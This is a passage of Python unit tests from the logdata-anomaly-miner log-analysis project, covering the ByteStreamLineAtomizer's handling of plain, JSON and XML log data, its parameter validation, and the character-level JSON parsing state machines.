self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, []) self.assertEqual(bsla.consume_data(data, True), len(data)) self.assertEqual(self.output_stream.getvalue(), incomplete) self.assertIsNone(bsla.last_unconsumed_log_atom) self.reset_output_stream() # use_real_time bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, [], use_real_time=True) self.assertEqual(bsla.consume_data(line, False), len(line)) self.assertEqual(self.output_stream.getvalue().split(" ", 2)[-1], output) # skip datetime self.reset_output_stream() self.assertIsNone(bsla.last_unconsumed_log_atom) def test2consume_data_json(self): """ Test the functionality of the ByteStreamLineAtomizer on json data. Correct parsing of json data using a state machine is tested in the JsonStateMachineTest. """ # line < max_line_length data = b"fixed data" fdme = DummyFixedDataModelElement("fixed", data) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) atom_filter = AtomFilters.SubhandlerFilter(None) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) atom_filter.add_handler(nmpd) json_data = b'{\n\t"a": 1,\n\t"b": {"x": 2}}' data = b"some log line." bsla = ByteStreamLineAtomizer(fdme, [atom_filter], [self.stream_printer_event_handler], 65536, [], json_format=True) self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) # this is no valid json and should process only data until the last \n self.assertEqual(bsla.consume_data(data + json_data + data, False), len(data) + json_data.rfind(b"\n") + 1) json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d": 3}' self.assertEqual(bsla.consume_data(json_data, False), len(json_data)) self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}' self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) self.assertEqual(bsla.consume_data(data + json_data, False), len(data) + json_data.rfind(b"\n") + 1) # even when the first json data gets invalidated, the second one starts after an empty line and is therefore valid until the end. json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n\n{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}' self.assertEqual(bsla.consume_data(json_data + data, False), len(json_data)) self.assertEqual(bsla.consume_data(data + json_data + data, False), len(data) + len(json_data)) # this is an incomplete json, but it still can be valid. json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d' self.assertEqual(bsla.consume_data(json_data, False), json_data.rfind(b"\n") + 1) # this is an incomplete json and the end can not be valid. json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, d' self.assertEqual(bsla.consume_data(json_data, False), json_data.rfind(b"\n") + 1) self.reset_output_stream() # line > max_line_length json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n{\n"a": 1,\n\t"b": {"c": 2},"d": 3}\n' json2 = b'{"a": 1,"b": {"c": 2},"d": 3}{"a": 1,"b": {"c": 2},"d": 3' bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 25, [], json_format=True) self.assertEqual(bsla.consume_data(json_data, False), json_data.rfind(b'\n') + 1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(bsla.consume_data(json_data, True), len(json_data)) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(bsla.consume_data(json_data, False), len(json_data)) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(bsla.consume_data(json_data, True), len(json_data)) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 25, [], json_format=True) self.assertEqual(bsla.consume_data(json2, True), len(json2)) self.assertEqual(self.output_stream.getvalue(), 'Overlong line terminated by end of stream (1 lines)\n {"a": 1,"b": {"c": 2},"d":' ' 3}{"a": 1,"b": {"c": 2},"d": 3\n\n') self.reset_output_stream() self.assertEqual(bsla.consume_data(json2, False), len(json2)) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(bsla.consume_data(json2, True), len(json2)) self.assertEqual(self.output_stream.getvalue(), 'Incomplete last line (1 lines)\n {"a": 1,"b": {"c": 2},"d": 3\n\n') self.reset_output_stream() self.assertEqual(bsla.consume_data(json2, False), len(json2.rsplit(b"}", 2)[0]) + 1) self.assertEqual(self.output_stream.getvalue(), "") def test3consume_data_xml(self): """ Test the functionality of the ByteStreamLineAtomizer on xml data. The ByteStreamLineAtomizer is not expected to do anything other than passing the data to the XmlModelElement. """ data = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" output = ("New path(s) detected\nNewMatchPathDetector: \"None\" (1 lines)\n ['/xml', '/xml/messages/note/+id/id', '/xml/messages/note/to/to', '/xml/messages/note/from/from', " "'/xml/messages/note/body/text1/text1', '/xml/messages/note/body/text2/text2', '/xml/messages/note/+id/id/0', '/xml/messages/note/to/to/0', '/xml/messages/note/from/from/0'," " '/xml/messages/note/?heading', '/xml/messages/note/body/text1/text1/0', '/xml/messages/note/body/text2/text2/0', '/xml/messages/note/+id/id/1', '/xml/messages/note/_+opt/opt'," " '/xml/messages/note/to/to/1', '/xml/messages/note/from/from/1', '/xml/messages/note/?heading/heading', '/xml/messages/note/body/text1/text1/1', '/xml/messages/note/body/text2/text2/1']\n\n") key_parser_dict = {"messages": [{"note": { "+id": DummyNumberModelElement("id"), "_+opt": DummyFixedDataModelElement("opt", b"text"), "to": AnyByteDataModelElement("to"), "from": AnyByteDataModelElement("from"), "?heading": AnyByteDataModelElement("heading"), "body": { "text1": AnyByteDataModelElement("text1"), "text2": AnyByteDataModelElement("text2") } }}]} xmlme = XmlModelElement("xml", key_parser_dict) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) atom_filter = AtomFilters.SubhandlerFilter(None) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) atom_filter.add_handler(nmpd) bsla = ByteStreamLineAtomizer(xmlme, [atom_filter], [self.stream_printer_event_handler], 65536, [], xml_format=True) self.assertEqual(bsla.consume_data(data, False), len(data)) self.assertEqual(self.output_stream.getvalue(), output) def test4validate_parameters(self): """Test all initialization parameters for the atomizer. Input parameters must be validated in the class.""" data = b"fixed data" fdme = DummyFixedDataModelElement("fixed", data) self.assertRaises(TypeError, ByteStreamLineAtomizer, "default", [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, b"Default", [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, None, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, True, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, 123, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, 123.3, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, ["default"], [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, {"id": "Default"}, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, (), [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, set(), [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, "default", [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, b"Default", [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, True, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, 123, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, 123.3, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, ["default"], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, {"id": "Default"}, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, (), [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, set(), [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], "default", 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], b"Default", 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], None, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], True, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], 123, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], 123.3, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], ["default"], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], {"id": "Default"}, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], (), 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], set(), 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], "default", []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], b"Default", []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], None, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], True, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 123.3, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], ["default"], []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], {"id": "Default"}, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], (), []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], set(), []) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 0, []) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], -1, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, "default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, 123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, 123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, {"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, ()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=set()) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=b"") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=set()) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=True, xml_format=True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=set()) ByteStreamLineAtomizer(fdme, [], [], 65536, ["path"], resource_name="test1") ByteStreamLineAtomizer(fdme, None, [], 65536, [], resource_name=b"test1") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/JsonStateMachineTest.py000066400000000000000000000667621500476301700275510ustar00rootroot00000000000000import unittest from aminer.input.JsonStateMachine import json_machine, constant_machine, string_machine, utf8_machine, hex_machine, number_machine,\ array_machine, object_machine from unit.TestBase import TestBase class ByteStreamLineAtomizerTest(TestBase): """Unittests for the JsonStateMachine.""" def test1hex_machine_valid_values(self): """Test the hex_machine with all valid four digit values from 0x0000 to 0xFFFF.""" def check_value(data): self.assertEqual(data, i) for i in range(65536): string = str(format(i, '#06x')).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) for i in range(65536): string = str(format(i, '#06x')).upper().encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test2hex_machine_too_short_value(self): """Test the hex_machine with too short hex values.""" def check_value(data): self.assertEqual(data, i) for i in range(4096): # converts the integer to the shortest possible hex string. string = str(hex(i)).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) i = 4096 string = str(hex(i)).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test3hex_machine_too_long_value(self): """Test the hex_machine with too long hex values. All values longer than 4 digits are stripped.""" def check_value(data): self.assertEqual(data, i) # only 00FF is read. i = 255 string = b'0x00FFFF'[2:] # remove 0x state = hex_machine(check_value) j = 0 for j, c in enumerate(string): state = state(c) if state is None: break self.assertEqual(j, 3) self.assertIsNone(state) # only 0F12 is read. i = 3858 string = b'0x0F1234'[2:] # remove 0x state = hex_machine(check_value) j = 0 for j, c in enumerate(string): state = state(c) if state is None: break self.assertEqual(j, 3) self.assertIsNone(state) def test4hex_machine_boundary_values(self): """Test boundary values before and after 0-9, a-f, A-F.""" def check_value(data): self.assertEqual(data, i) allowed_value_list = '0123456789abcdefABCDEF' forbidden_value_list = [int(hex(j), 16) for j in range(48)] + [int(hex(j), 16) for j in range(58, 65)] + [ int(hex(j), 16) for j in range(71, 97)] + [int(hex(j), 16) for j in range(103, 128)] for a in allowed_value_list: state = hex_machine(check_value) string = '0x'+a+a+a+a i = int(string, 16) # convert hex string to integer for _ in range(4): state = state(ord(a)) self.assertEqual(state, None) for f in forbidden_value_list: state = hex_machine(check_value) self.assertIsNone(state(f), "value: %d, char: '%s' should not be allowed in the hex_machine!" % (f, chr(f))) def test5hex_machine_started_from_string_machine(self): """Test if the hex_machine is started from the string_machine.""" def check_value(_data): pass string = b"\u02FF" state = string_machine(check_value) hex_machine_found = False for c in string: state = state(c) if state.__name__ == '_hex': hex_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(hex_machine_found) string = b"\uff02" state = string_machine(check_value) hex_machine_found = False for c in string: state = state(c) if state.__name__ == '_hex': hex_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(hex_machine_found) def test6utf8_machine_allowed_2_byte_values(self): """ Test all allowed values for the utf8_machine with 2 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex2(data): self.assertEqual(data, (i - 194)*64 + j) step = 4 for i in range(192, 224): for j in range(128, 192, step): state = utf8_machine(i, check_value_hex2) state = state(j) # check if the state is None only once to save time. self.assertIsNone(state) def test7utf8_machine_forbidden_2_byte_boundary_values(self): """Test all boundary values for 2 byte utf8 values.""" def raise_error(_): raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(191, raise_error)) self.assertIsNone(utf8_machine(192, raise_error)(127)) self.assertIsNone(utf8_machine(192, raise_error)(192)) self.assertRaises(Exception, utf8_machine(192, raise_error), 128) self.assertRaises(Exception, utf8_machine(192, raise_error), 191) def test8utf8_machine_allowed_3_byte_values(self): """ Test all allowed values for the utf8_machine with 3 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex3(data): self.assertEqual(data, (i - 224)*64*64 + (j - 128)*64 + k - 128) step = 4 for i in range(224, 240): for j in range(128, 192, step): for k in range(128, 192): state = utf8_machine(i, check_value_hex3) state = state(j) state = state(k) # check if the state is None only once to save time. self.assertIsNone(state) def test9utf8_machine_forbidden_3_byte_boundary_values(self): """Test all boundary values for 3 byte utf8 values.""" def raise_error(_): raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(224, raise_error)(127)) self.assertIsNone(utf8_machine(224, raise_error)(192)) self.assertIsNone(utf8_machine(224, raise_error)(128)(127)) self.assertIsNone(utf8_machine(224, raise_error)(191)(192)) self.assertRaises(Exception, utf8_machine(224, raise_error)(128), 128) self.assertRaises(Exception, utf8_machine(224, raise_error)(191), 191) def test10utf8_machine_allowed_4_byte_values(self): """ Test all allowed values for the utf8_machine with 4 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex4(data): self.assertEqual(data, (i - 240)*64*64*64 + (j - 128)*64*64 + (k - 128)*64 + m - 128) step = 4 for i in range(240, 248): for j in range(128, 192, step): for k in range(128, 192, step): for m in range(128, 192, step): state = utf8_machine(i, check_value_hex4) state = state(j) state = state(k) state = state(m) # check if the state is None only once to save time. self.assertIsNone(state) def test11utf8_machine_forbidden_3_byte_boundary_values(self): """Test all boundary values for 4 byte utf8 values.""" def raise_error(_): raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(240, raise_error)(127)) self.assertIsNone(utf8_machine(240, raise_error)(192)) self.assertIsNone(utf8_machine(240, raise_error)(128)(127)) self.assertIsNone(utf8_machine(240, raise_error)(191)(192)) self.assertIsNone(utf8_machine(240, raise_error)(128)(128)(127)) self.assertIsNone(utf8_machine(240, raise_error)(191)(191)(192)) self.assertRaises(Exception, utf8_machine(240, raise_error)(128)(128), 128) self.assertRaises(Exception, utf8_machine(240, raise_error)(191)(191), 191) def test12utf8_machine_started_from_string_machine(self): """Test if the utf8_machine is started from the string_machine.""" def check_value(_data): pass string = b"File pattern: file\x5f.txt" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertFalse(utf8_machine_found) string = b"It is 20\xc2\xb0C" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) string = b"This is a foreign letter: \xe0\xa0\xab" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) string = b"This is an egyptian hieroglyph: \xf0\x93\x80\x90" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) def test13string_machine_valid_values(self): """Test the string_machine with all valid characters.""" def check_value(data): self.assertEqual(data, allowed_chars) allowed_chars = "\n" for c in range(0x20, 0x80): if c in (0x22, 0x5c): # skip "\ continue allowed_chars += chr(c) state = string_machine(check_value) for c in allowed_chars.encode(): state = state(c) self.assertEqual(state.__name__, "_string") state = state(ord('"')) self.assertIsNone(state) def test14string_machine_invalid_values(self): """Test the string_machine with some invalid values.""" def raise_error(_): raise Exception("Invalid returned as valid.") for c in range(0x20): # ascii control characters if c == 0xa: continue state = string_machine(raise_error) self.assertIsNone(state(c)) for c in range(0x80, 0xc0): # some characters after the ascii table state = string_machine(raise_error) self.assertIsNone(state(c)) def test15string_machine_escaped_strings(self): """Test all allowed escape strings in the string_machine.""" def check_value(data): self.assertEqual(data, compare_strings) escape_strings = b"bf\"\\/" compare_strings = "\b\f\"\\/" state = string_machine(check_value) for c in escape_strings: state = state(0x5c) # \ state = state(c) state = state(0x22) # " self.assertIsNone(state) def test16constant_machine_valid_values(self): """Test all allowed values for the constant_machine. The first letter was already handled by the json_machine.""" def check_value(data): self.assertEqual(data, value) TRUE = [0x72, 0x75, 0x65] FALSE = [0x61, 0x6c, 0x73, 0x65] NULL = [0x75, 0x6c, 0x6c] value = True state = constant_machine(TRUE, True, check_value) for t in TRUE: state = state(t) self.assertIsNone(state) value = False state = constant_machine(FALSE, False, check_value) for f in FALSE: state = state(f) self.assertIsNone(state) value = None state = constant_machine(NULL, None, check_value) for n in NULL: state = state(n) self.assertIsNone(state) def test17constant_machine_invalid_values(self): """Test if constant_machine fails. The first letter was already handled by the json_machine.""" def raise_error(_): raise Exception("Invalid returned as valid.") TRUE = [0x72, 0x75, 0x65] TRUE_UPPER = [0x52, 0x55, 0x45] FALSE = [0x61, 0x6c, 0x73, 0x65] FALSE_UPPER = [0x41, 0x4c, 0x53, 0x45] NULL = [0x75, 0x6c, 0x6c] NULL_UPPER = [0x55, 0x4c, 0x4c] NONE = [0x6f, 0x6e, 0x65] state = constant_machine(TRUE, True, raise_error) self.assertIsNone(state(TRUE_UPPER[0])) state = constant_machine(FALSE, False, raise_error) self.assertIsNone(state(FALSE_UPPER[0])) state = constant_machine(NULL, None, raise_error) self.assertIsNone(state(NULL_UPPER[0])) state = constant_machine(NULL, None, raise_error) self.assertIsNone(state(NONE[0])) def test18constant_machine_started_from_json_machine(self): """Test if the constant_machine is started from the json_machine. Due to changes in the json_machine all values must be objects.""" def check_value(data): self.assertEqual(data, {'var': value}) OBJECT_PREFIX = [0x7b, 0x22, 0x76, 0x61, 0x72, 0x22, 0x3a, 0x20] # {"var": TRUE = [0x74, 0x72, 0x75, 0x65] FALSE = [0x66, 0x61, 0x6c, 0x73, 0x65] NULL = [0x6e, 0x75, 0x6c, 0x6c] value = True state = json_machine(check_value) for t in OBJECT_PREFIX + TRUE: state = state(t) self.assertEqual(state(ord('}')).__name__, '_value') value = False state = json_machine(check_value) for f in OBJECT_PREFIX + FALSE: state = state(f) self.assertEqual(state(ord('}')).__name__, '_value') value = None state = json_machine(check_value) for n in OBJECT_PREFIX + NULL: state = state(n) self.assertEqual(state(ord('}')).__name__, '_value') def check_number_machine(self, check_int_value, value, end_sign): state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNone(state(end_sign)) def test19number_machine_valid_values(self): """Test valid values in the number_machine.""" def check_int_value(data, byte_data): self.assertEqual(data, int(value)) self.assertEqual(end_sign, byte_data) def check_float_value(data, byte_data): self.assertEqual(round(data, 10), float(value)) self.assertEqual(end_sign, byte_data) end_sign = ord(',') value = b'222' self.check_number_machine(check_int_value, value, end_sign) value = b'9223372036854775808' # maxsize 2^64 self.check_number_machine(check_int_value, value, end_sign) value = b'-222' self.check_number_machine(check_int_value, value, end_sign) value = b'+222' self.check_number_machine(check_int_value, value, end_sign) value = b'21.50' self.check_number_machine(check_float_value, value, end_sign) value = b'21.05' 